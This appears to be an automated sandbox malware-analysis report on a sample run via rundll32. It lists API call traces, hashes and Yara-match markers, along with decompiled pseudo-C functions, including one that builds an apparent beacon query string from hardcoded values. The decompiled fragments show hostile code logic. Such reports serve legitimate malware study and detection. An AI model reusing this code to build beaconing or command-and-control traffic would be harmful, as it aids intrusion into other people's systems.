                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                • Instruction ID: 26c15123ba19a7414850156c4db45ea5d7e19f61deb68ed5f27bc00cd0758d9d
                                • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                • Instruction Fuzzy Hash: 8B21927A900204AFDF10EF69C88096BFBA5FF45310B0981AAD9168F245D730FA15C7E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 71%
                                			E0343829C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                				intOrPtr _v8;
                                				char _v12;
                                				void* __ebp;
                                				signed int* _t43;
                                				char _t44;
                                				void* _t46;
                                				void* _t49;
                                				intOrPtr* _t53;
                                				void* _t54;
                                				void* _t65;
                                				long _t66;
                                				signed int* _t80;
                                				signed int* _t82;
                                				void* _t84;
                                				signed int _t86;
                                				void* _t89;
                                				void* _t95;
                                				void* _t96;
                                				void* _t99;
                                				void* _t106;
                                
                                				_t43 = _t84;
                                				_t65 = __ebx + 2;
                                				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                				_t89 = _t95;
                                				_t96 = _t95 - 8;
                                				_push(_t65);
                                				_push(_t84);
                                				_push(_t89);
                                				asm("cld");
                                				_t66 = _a8;
                                				_t44 = _a4;
                                				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                					_push(_t89);
                                					E03438407(_t66 + 0x10, _t66, 0xffffffff);
                                					_t46 = 1;
                                				} else {
                                					_v12 = _t44;
                                					_v8 = _a12;
                                					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                					_t86 =  *(_t66 + 0xc);
                                					_t80 =  *(_t66 + 8);
                                					_t49 = E034384C1(_t66);
                                					_t99 = _t96 + 4;
                                					if(_t49 == 0) {
                                						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                						goto L11;
                                					} else {
                                						while(_t86 != 0xffffffff) {
                                							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                							if(_t53 == 0) {
                                								L8:
                                								_t80 =  *(_t66 + 8);
                                								_t86 = _t80[_t86 + _t86 * 2];
                                								continue;
                                							} else {
                                								_t54 =  *_t53();
                                								_t89 = _t89;
                                								_t86 = _t86;
                                								_t66 = _a8;
                                								_t55 = _t54;
                                								_t106 = _t54;
                                								if(_t106 == 0) {
                                									goto L8;
                                								} else {
                                									if(_t106 < 0) {
                                										_t46 = 0;
                                									} else {
                                										_t82 =  *(_t66 + 8);
                                										E034383AC(_t55, _t66);
                                										_t89 = _t66 + 0x10;
                                										E03438407(_t89, _t66, 0);
                                										_t99 = _t99 + 0xc;
                                										E034384A3(_t82[2]);
                                										 *(_t66 + 0xc) =  *_t82;
                                										_t66 = 0;
                                										_t86 = 0;
                                										 *(_t82[2])(1);
                                										goto L8;
                                									}
                                								}
                                							}
                                							goto L13;
                                						}
                                						L11:
                                						_t46 = 1;
                                					}
                                				}
                                				L13:
                                				return _t46;
                                			}

                                Disassembly address column only (0x034382a0 through 0x03438389, with 0x00000000 entries where the address was not resolved); the instruction text for these addresses was not captured in the export.

                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                • Instruction ID: 03bcc5aad74b06d4be9e122e348c38eb8ddbe8c5a27ee10f46ceebd855b0c1ce
                                • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                • Instruction Fuzzy Hash: 7421D8729002049FCB10DF69C8C086BF7A5FF49320B0A8559E8199F345E731F919CBE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03485C28: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 03485C5C
                                  • Part of subcall function 03485C28: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 03485D1D
                                  • Part of subcall function 03485C28: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 03485D26
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 03473860
                                  • Part of subcall function 0347A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0347A990
                                  • Part of subcall function 0347A976: CreateWaitableTimerA.KERNEL32(0349A1E8,00000001,?), ref: 0347A9AD
                                  • Part of subcall function 0347A976: GetLastError.KERNEL32(?,00000000,03488C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 0347A9BE
                                  • Part of subcall function 0347A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,03488C06,00000000,00000000,0000801C), ref: 0347A9FE
                                  • Part of subcall function 0347A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,03488C06,00000000,00000000,0000801C), ref: 0347AA1D
                                  • Part of subcall function 0347A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,03488C06,00000000,00000000,0000801C), ref: 0347AA33
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 034738C3
                                • StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000,00000000,00000000), ref: 0347393F
                                • StrTrimA.SHLWAPI(00000000,?), ref: 03473961
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 034739A1
                                  • Part of subcall function 0347F08E: RtlAllocateHeap.NTDLL(00000000,00000010,76CDF730), ref: 0347F0B0
                                  • Part of subcall function 0347F08E: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?,?,?,?,03473899,?), ref: 0347F0DE
                                • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 03473A47
                                • CloseHandle.KERNEL32(?), ref: 03473CD6
                                  • Part of subcall function 0347E2E6: WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,03473A69,?), ref: 0347E2F2
                                  • Part of subcall function 0347E2E6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,03473A69,?), ref: 0347E320
                                  • Part of subcall function 0347E2E6: ResetEvent.KERNEL32(?,?,?,?,?,03473A69,?), ref: 0347E33A
                                • WaitForSingleObject.KERNEL32(?,00000000,?), ref: 03473A7C
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 03473A8B
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 03473AB8
                                • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 03473AD2
                                • _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 03473B1A
                                • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF), ref: 03473B34
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03473B4A
                                • ReleaseMutex.KERNEL32(?), ref: 03473B67
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 03473B78
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 03473B87
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 03473BBB
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 03473BD5
                                • SwitchToThread.KERNEL32 ref: 03473BD7
                                • ReleaseMutex.KERNEL32(?), ref: 03473BE1
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 03473C1F
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 03473C2A
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 03473C4D
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 03473C67
                                • SwitchToThread.KERNEL32 ref: 03473C69
                                • ReleaseMutex.KERNEL32(?), ref: 03473C73
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 03473C88
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 03473CEA
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 03473CF6
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 03473D02
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 03473D0E
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 03473D1A
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 03473D26
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 03473D32
                                • RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 03473D41
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Wait$CloseHandleObjectSingle$TimerWaitable$MultipleObjects$HeapMutexRelease_allmul$FreeThread$CreateErrorEventLastSwitchTime$AllocateExitFileOpenResetSystemTrimUser
                                • String ID:
                                • API String ID: 2369282788-0
                                • Opcode ID: 3c835343f69f3c0e0b8b4df45af62cc15ab4c1c091f04c5a9aaefaa524a82b37
                                • Instruction ID: 7c6771ca7ebcc13a99ec6f9366f30944a96eae050e261edd022edd2ad6d25b39
                                • Opcode Fuzzy Hash: 3c835343f69f3c0e0b8b4df45af62cc15ab4c1c091f04c5a9aaefaa524a82b37
                                • Instruction Fuzzy Hash: 74E19F76508305AFDB11EF65CC849AFBBECEB44354F090A2FF595AE2A0D7318C049B96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlAllocateHeap.NTDLL ref: 0348F1E5
                                • GetTickCount.KERNEL32 ref: 0348F1FF
                                • wsprintfA.USER32 ref: 0348F252
                                • QueryPerformanceFrequency.KERNEL32(?), ref: 0348F25E
                                • QueryPerformanceCounter.KERNEL32(?), ref: 0348F269
                                • _aulldiv.NTDLL(?,?,?,?), ref: 0348F27F
                                • wsprintfA.USER32 ref: 0348F295
                                • wsprintfA.USER32 ref: 0348F2AF
                                • wsprintfA.USER32 ref: 0348F2D4
                                • HeapFree.KERNEL32(00000000,?), ref: 0348F2E7
                                • wsprintfA.USER32 ref: 0348F30B
                                • HeapFree.KERNEL32(00000000,?), ref: 0348F31E
                                • wsprintfA.USER32 ref: 0348F358
                                • wsprintfA.USER32 ref: 0348F37C
                                • lstrcat.KERNEL32(?,?), ref: 0348F3B4
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0348F3CE
                                • GetTickCount.KERNEL32 ref: 0348F3DE
                                • RtlEnterCriticalSection.NTDLL(0616C2D0), ref: 0348F3F2
                                • RtlLeaveCriticalSection.NTDLL(0616C2D0), ref: 0348F410
                                • StrTrimA.SHLWAPI(00000000,034953E8,00000000,0616C310), ref: 0348F449
                                • lstrcpy.KERNEL32(00000000,?), ref: 0348F46B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0348F472
                                • lstrcat.KERNEL32(00000000,?), ref: 0348F479
                                • lstrcat.KERNEL32(00000000,?), ref: 0348F480
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 0348F4FA
                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 0348F50C
                                • HeapFree.KERNEL32(00000000,00000000,00000000,0616C310), ref: 0348F51B
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348F52D
                                • HeapFree.KERNEL32(00000000,?), ref: 0348F53F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Freewsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveTrim_aulldiv
                                • String ID:
                                • API String ID: 4198993012-0
                                • Opcode ID: b5a98971b73f65bcbc729740a4305f8600c15ff1324776f320af71b22daf42c6
                                • Instruction ID: c0abccac21332a5fda0eab8f35d15da0d4dd233b515b700268953bf0898973e1
                                • Opcode Fuzzy Hash: b5a98971b73f65bcbc729740a4305f8600c15ff1324776f320af71b22daf42c6
                                • Instruction Fuzzy Hash: 5EA19771500205AFCB02EFA8EC85E5A7BE8FF59304F15052BF908EE225E735D829DB95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(?,00000000,?,?), ref: 03487B51
                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 03487BED
                                • lstrcpyn.KERNEL32(00000000,?,?), ref: 03487C02
                                • HeapFree.KERNEL32(00000000,00000000), ref: 03487C1D
                                • StrChrA.SHLWAPI(?,00000020,00000000,?,?,?), ref: 03487D04
                                • StrChrA.SHLWAPI(00000001,00000020), ref: 03487D15
                                • lstrlen.KERNEL32(00000000), ref: 03487D29
                                • memmove.NTDLL(?,?,00000001), ref: 03487D39
                                • lstrlen.KERNEL32(?,00000000,?,?,?), ref: 03487D65
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03487D8B
                                • memcpy.NTDLL(00000000,?,?), ref: 03487D9F
                                • memcpy.NTDLL(?,?,?), ref: 03487DBF
                                • HeapFree.KERNEL32(00000000,?), ref: 03487DFB
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03487EC1
                                • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 03487F09
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                                • String ID: GET $GET $OPTI$OPTI$POST$PUT
                                • API String ID: 3227826163-647159250
                                • Opcode ID: ed54769e925390e357fc8986e8e49812e00e49f18d76fe3efb0f898dc5cda64e
                                • Instruction ID: 75fa27ddbfe2ed248593ab8b2ee950f1160d4e6540f5eba185aad2914c612e5e
                                • Opcode Fuzzy Hash: ed54769e925390e357fc8986e8e49812e00e49f18d76fe3efb0f898dc5cda64e
                                • Instruction Fuzzy Hash: 28E17A35A00205EFDB15EFA9C894BAEBBB9FF04300F28459AE915AF350D730E951DB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlAllocateHeap.NTDLL ref: 0347E65B
                                • wsprintfA.USER32 ref: 0347E6C5
                                • wsprintfA.USER32 ref: 0347E70B
                                • wsprintfA.USER32 ref: 0347E72C
                                • lstrcat.KERNEL32(00000000,?), ref: 0347E763
                                • wsprintfA.USER32 ref: 0347E784
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0347E79E
                                • wsprintfA.USER32 ref: 0347E7C5
                                • HeapFree.KERNEL32(00000000,?), ref: 0347E7DA
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0347E7F4
                                • RtlEnterCriticalSection.NTDLL(0616C2D0), ref: 0347E815
                                • RtlLeaveCriticalSection.NTDLL(0616C2D0), ref: 0347E82F
                                  • Part of subcall function 0348EA15: lstrlen.KERNEL32(00000000,76CC81D0,?,76C85520,773BEEF0,?,00000000,0347E842,00000000,0616C310), ref: 0348EA40
                                  • Part of subcall function 0348EA15: lstrlen.KERNEL32(?,?,00000000,0347E842,00000000,0616C310), ref: 0348EA48
                                  • Part of subcall function 0348EA15: strcpy.NTDLL ref: 0348EA5F
                                  • Part of subcall function 0348EA15: lstrcat.KERNEL32(00000000,?), ref: 0348EA6A
                                  • Part of subcall function 0348EA15: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,0347E842,00000000,0616C310), ref: 0348EA87
                                • StrTrimA.SHLWAPI(00000000,034953E8,00000000,0616C310), ref: 0347E864
                                  • Part of subcall function 03478DC7: lstrlen.KERNEL32(06168560,76C85520,76CC81D0,773BEEF0,0347E873,?), ref: 03478DD7
                                  • Part of subcall function 03478DC7: lstrlen.KERNEL32(?), ref: 03478DDF
                                  • Part of subcall function 03478DC7: lstrcpy.KERNEL32(00000000,06168560), ref: 03478DF3
                                  • Part of subcall function 03478DC7: lstrcat.KERNEL32(00000000,?), ref: 03478DFE
                                • lstrcpy.KERNEL32(?,?), ref: 0347E88D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0347E897
                                • lstrcat.KERNEL32(00000000,?), ref: 0347E8A2
                                • lstrcat.KERNEL32(00000000,?), ref: 0347E8A9
                                • RtlEnterCriticalSection.NTDLL(0616C2D0), ref: 0347E8B4
                                • RtlLeaveCriticalSection.NTDLL(0616C2D0), ref: 0347E8D0
                                  • Part of subcall function 03477DF5: memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,03485583,00000000,00000000), ref: 03477E46
                                  • Part of subcall function 03477DF5: memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 03477ED9
                                • HeapFree.KERNEL32(00000000,?,00000001,0616C310,?,?,?), ref: 0347E997
                                • HeapFree.KERNEL32(00000000,?,?), ref: 0347E9AF
                                • HeapFree.KERNEL32(00000000,?,00000000,0616C310), ref: 0347E9BD
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0347E9CB
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0347E9D6
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$lstrcatwsprintf$CriticalSectionlstrlen$lstrcpy$AllocateEnterLeaveTrimmemcpy$strcpy
                                • String ID:
                                • API String ID: 4032678529-0
                                • Opcode ID: f2d7ba11b31d7d5bdfaa59df7d11b6409775551995dad08328ac1aaeec5b1ff5
                                • Instruction ID: 7ee201c728688f0e2d7bc3e2af004a12df6444ee8365a617ddb2666cf3bae02b
                                • Opcode Fuzzy Hash: f2d7ba11b31d7d5bdfaa59df7d11b6409775551995dad08328ac1aaeec5b1ff5
                                • Instruction Fuzzy Hash: E4B18572104201AFDB11EF69EC80E5A7BE9EF99300F0A056AF948EF260D735E855CF55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 75%
                                			E0343300E(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
                                				intOrPtr _v4;
                                				signed int _v8;
                                				int* _v12;
                                				char* _v16;
                                				intOrPtr _v20;
                                				void* _v24;
                                				intOrPtr _v32;
                                				intOrPtr _v36;
                                				void* _v40;
                                				void* __ebx;
                                				void* __edi;
                                				long _t66;
                                				intOrPtr _t67;
                                				intOrPtr _t68;
                                				intOrPtr _t69;
                                				intOrPtr _t70;
                                				intOrPtr _t71;
                                				void* _t74;
                                				intOrPtr _t75;
                                				int _t78;
                                				intOrPtr _t79;
                                				int _t82;
                                				intOrPtr _t83;
                                				intOrPtr _t84;
                                				void* _t86;
                                				void* _t89;
                                				intOrPtr _t93;
                                				intOrPtr _t97;
                                				intOrPtr* _t99;
                                				int* _t105;
                                				int* _t115;
                                				char** _t117;
                                				char* _t118;
                                				intOrPtr* _t123;
                                				intOrPtr* _t125;
                                				intOrPtr* _t127;
                                				intOrPtr* _t129;
                                				intOrPtr _t132;
                                				intOrPtr _t136;
                                				int _t139;
                                				intOrPtr _t141;
                                				int _t144;
                                				void* _t145;
                                				intOrPtr _t159;
                                				void* _t161;
                                				int _t162;
                                				void* _t163;
                                				void* _t164;
                                				long _t165;
                                				intOrPtr* _t166;
                                				intOrPtr* _t167;
                                				intOrPtr _t168;
                                				intOrPtr* _t171;
                                				char** _t174;
                                				char** _t176;
                                				char** _t177;
                                				void* _t182;
                                
                                				_t66 = __eax;
                                				_t174 =  &_v16;
                                				_t145 = _a20;
                                				_a20 = 8;
                                				if(__eax == 0) {
                                					_t66 = GetTickCount();
                                				}
                                				_t67 =  *0x343a018; // 0x95dc214e
                                				asm("bswap eax");
                                				_t68 =  *0x343a014; // 0x3a87c8cd
                                				asm("bswap eax");
                                				_t69 =  *0x343a010; // 0xd8d2f808
                                				asm("bswap eax");
                                				_t70 =  *0x343a00c; // 0x81762942
                                				asm("bswap eax");
                                				_t71 =  *0x343a348; // 0x21ad5a8
                                				_t3 = _t71 + 0x343b62b; // 0x74666f73
                                				_t162 = wsprintfA(_t145, _t3, 3, 0x3d175, _t70, _t69, _t68, _t67,  *0x343a02c,  *0x343a004, _t66);
                                				_t74 = E03436927();
                                				_t75 =  *0x343a348; // 0x21ad5a8
                                				_t4 = _t75 + 0x343b66b; // 0x74707526
                                				_t78 = wsprintfA(_t162 + _t145, _t4, _t74);
                                				_t176 =  &(_t174[0xe]);
                                				_t163 = _t162 + _t78;
                                				if(_a24 != 0) {
                                					_t141 =  *0x343a348; // 0x21ad5a8
                                					_t8 = _t141 + 0x343b676; // 0x732526
                                					_t144 = wsprintfA(_t163 + _t145, _t8, _a24);
                                					_t176 =  &(_t176[3]);
                                					_t163 = _t163 + _t144;
                                				}
                                				_t79 =  *0x343a348; // 0x21ad5a8
                                				_t10 = _t79 + 0x343b78e; // 0x55e8d36
                                				_t182 = _a20 - _t10;
                                				_t12 = _t79 + 0x343b2de; // 0x74636126
                                				_t157 = 0 | _t182 == 0x00000000;
                                				_t82 = wsprintfA(_t163 + _t145, _t12, _t182 == 0);
                                				_t177 =  &(_t176[3]);
                                				_t164 = _t163 + _t82;
                                				_t83 = E034322D7(_t10);
                                				_a32 = _t83;
                                				if(_t83 != 0) {
                                					_t136 =  *0x343a348; // 0x21ad5a8
                                					_t17 = _t136 + 0x343b8d0; // 0x736e6426
                                					_t139 = wsprintfA(_t164 + _t145, _t17, _t83);
                                					_t177 =  &(_t177[3]);
                                					_t164 = _t164 + _t139;
                                					HeapFree( *0x343a2d8, 0, _a40);
                                				}
                                				_t84 = E03432A11();
                                				_a32 = _t84;
                                				if(_t84 != 0) {
                                					_t132 =  *0x343a348; // 0x21ad5a8
                                					_t21 = _t132 + 0x343b8d8; // 0x6f687726
                                					wsprintfA(_t164 + _t145, _t21, _t84);
                                					_t177 =  &(_t177[3]);
                                					HeapFree( *0x343a2d8, 0, _a40);
                                				}
                                				_t159 =  *0x343a3cc; // 0x55e95b0
                                				_t86 = E03432509(0x343a00a, _t159 + 4);
                                				_t165 = 0;
                                				_a16 = _t86;
                                				if(_t86 == 0) {
                                					L28:
                                					HeapFree( *0x343a2d8, _t165, _t145);
                                					return _a44;
                                				} else {
                                					_t89 = RtlAllocateHeap( *0x343a2d8, 0, 0x800);
                                					_a24 = _t89;
                                					if(_t89 == 0) {
                                						L27:
                                						HeapFree( *0x343a2d8, _t165, _a8);
                                						goto L28;
                                					}
                                					E03431BE9(GetTickCount());
                                					_t93 =  *0x343a3cc; // 0x55e95b0
                                					__imp__(_t93 + 0x40);
                                					asm("lock xadd [eax], ecx");
                                					_t97 =  *0x343a3cc; // 0x55e95b0
                                					__imp__(_t97 + 0x40);
                                					_t99 =  *0x343a3cc; // 0x55e95b0
                                					_t161 = E03431D33(1, _t157, _t145,  *_t99);
                                					asm("lock xadd [eax], ecx");
                                					if(_t161 == 0) {
                                						L26:
                                						HeapFree( *0x343a2d8, _t165, _a16);
                                						goto L27;
                                					}
                                					StrTrimA(_t161, 0x343928c);
                                					_push(_t161);
                                					_t105 = E0343393C();
                                					_v12 = _t105;
                                					if(_t105 == 0) {
                                						L25:
                                						HeapFree( *0x343a2d8, _t165, _t161);
                                						goto L26;
                                					}
                                					_t166 = __imp__;
                                					 *_t166(_t161, _a8);
                                					 *_t166(_a4, _v12);
                                					_t167 = __imp__;
                                					 *_t167(_v4, _v24);
                                					_t168 = E034361FC( *_t167(_v12, _t161), _v20);
                                					_v36 = _t168;
                                					if(_t168 == 0) {
                                						_v8 = 8;
                                						L23:
                                						E0343561E();
                                						L24:
                                						HeapFree( *0x343a2d8, 0, _v40);
                                						_t165 = 0;
                                						goto L25;
                                					}
                                					_t115 = E034310B7(_t145, 0xffffffffffffffff, _t161,  &_v24);
                                					_v12 = _t115;
                                					if(_t115 == 0) {
                                						_t171 = _v24;
                                						_v20 = E03435B9D(_t171, _t168, _v16, _v12);
                                						_t123 =  *((intOrPtr*)(_t171 + 8));
                                						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
                                						_t125 =  *((intOrPtr*)(_t171 + 8));
                                						 *((intOrPtr*)( *_t125 + 8))(_t125);
                                						_t127 =  *((intOrPtr*)(_t171 + 4));
                                						 *((intOrPtr*)( *_t127 + 8))(_t127);
                                						_t129 =  *_t171;
                                						 *((intOrPtr*)( *_t129 + 8))(_t129);
                                						E03436C2C(_t171);
                                					}
                                					if(_v8 != 0x10d2) {
                                						L18:
                                						if(_v8 == 0) {
                                							_t117 = _v16;
                                							if(_t117 != 0) {
                                								_t118 =  *_t117;
                                								_t169 =  *_v12;
                                								_v16 = _t118;
                                								wcstombs(_t118, _t118,  *_v12);
                                								 *_v24 = E03433C22(_v16, _v16, _t169 >> 1);
                                							}
                                						}
                                						goto L21;
                                					} else {
                                						if(_v16 != 0) {
                                							L21:
                                							E03436C2C(_v32);
                                							if(_v12 == 0 || _v8 == 0x10d2) {
                                								goto L24;
                                							} else {
                                								goto L23;
                                							}
                                						}
                                						_v8 = _v8 & 0x00000000;
                                						goto L18;
                                					}
                                				}
                                			}

                                APIs
                                • GetTickCount.KERNEL32 ref: 03433025
                                • wsprintfA.USER32 ref: 03433072
                                • wsprintfA.USER32 ref: 0343308F
                                • wsprintfA.USER32 ref: 034330B1
                                • wsprintfA.USER32 ref: 034330D8
                                • wsprintfA.USER32 ref: 03433103
                                • HeapFree.KERNEL32(00000000,?), ref: 03433116
                                • wsprintfA.USER32 ref: 03433135
                                • HeapFree.KERNEL32(00000000,?), ref: 03433146
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03433175
                                • GetTickCount.KERNEL32 ref: 03433187
                                • RtlEnterCriticalSection.NTDLL(055E9570), ref: 0343319B
                                • RtlLeaveCriticalSection.NTDLL(055E9570), ref: 034331B9
                                  • Part of subcall function 03431D33: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,75BCC740,034358D7,00000000,055E95B0), ref: 03431D5E
                                  • Part of subcall function 03431D33: lstrlen.KERNEL32(00000000,?,75BCC740,034358D7,00000000,055E95B0), ref: 03431D66
                                  • Part of subcall function 03431D33: strcpy.NTDLL ref: 03431D7D
                                  • Part of subcall function 03431D33: lstrcat.KERNEL32(00000000,00000000), ref: 03431D88
                                  • Part of subcall function 03431D33: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,034358D7,?,75BCC740,034358D7,00000000,055E95B0), ref: 03431DA5
                                • StrTrimA.SHLWAPI(00000000,0343928C,?,055E95B0), ref: 034331EB
                                  • Part of subcall function 0343393C: lstrlen.KERNEL32(055E9B68,00000000,00000000,00000000,03435902,00000000), ref: 0343394C
                                  • Part of subcall function 0343393C: lstrlen.KERNEL32(?), ref: 03433954
                                  • Part of subcall function 0343393C: lstrcpy.KERNEL32(00000000,055E9B68), ref: 03433968
                                  • Part of subcall function 0343393C: lstrcat.KERNEL32(00000000,?), ref: 03433973
                                • lstrcpy.KERNEL32(00000000,?), ref: 0343320E
                                • lstrcpy.KERNEL32(?,?), ref: 03433218
                                • lstrcat.KERNEL32(?,?), ref: 03433228
                                • lstrcat.KERNEL32(?,00000000), ref: 0343322F
                                  • Part of subcall function 034361FC: lstrlen.KERNEL32(?,00000000,055E9D70,00000000,034339E8,055E9F93,69B25F44,?,?,?,?,69B25F44,00000005,0343A00C,4D283A53,?), ref: 03436203
                                  • Part of subcall function 034361FC: mbstowcs.NTDLL ref: 0343622C
                                  • Part of subcall function 034361FC: memset.NTDLL ref: 0343623E
                                • wcstombs.NTDLL ref: 034332D2
                                  • Part of subcall function 03435B9D: SysAllocString.OLEAUT32(?), ref: 03435BD8
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                • HeapFree.KERNEL32(00000000,?), ref: 0343331B
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 03433327
                                • HeapFree.KERNEL32(00000000,?,?,055E95B0), ref: 03433334
                                • HeapFree.KERNEL32(00000000,?), ref: 03433341
